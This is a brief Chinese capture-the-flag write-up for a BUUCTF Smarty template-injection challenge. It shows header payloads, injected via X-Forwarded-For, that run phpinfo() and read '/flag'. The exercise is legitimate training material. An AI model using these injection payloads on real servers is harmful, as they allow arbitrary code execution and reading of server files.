第六十三题——[CISCN2019 华东南赛区]Web11

Posted 想学习安全的小白

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了第六十三题——[CISCN2019 华东南赛区]Web11相关的知识,希望对你有一定的参考价值。

题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,看到提示Smarty,猜测使用模板注入漏洞

在这里插入图片描述

第二步:构建漏洞

使用burpsuite改包,添加X-Forwarded-For头,X-Forwarded-For:{if phpinfo()}{/if},发现执行了phpinfo()
在这里插入图片描述

第三步:获取flag

使用X-Forwarded-For:{if readfile('/flag')}{/if}获取flag
在这里插入图片描述

以上是关于第六十三题——[CISCN2019 华东南赛区]Web11的主要内容,如果未能解决你的问题,请参考以下文章

[CISCN2019 华东南赛区]Double Secret

BUUCTF:[CISCN2019 华东南赛区]Web11

BUUCTF:[CISCN2019 华东南赛区]Web11

BUUCTF:[CISCN2019 华东南赛区]Web11

[CISCN2019 华东南赛区]Web4

《剑指offer》第六十三题(把字符串转换成整数)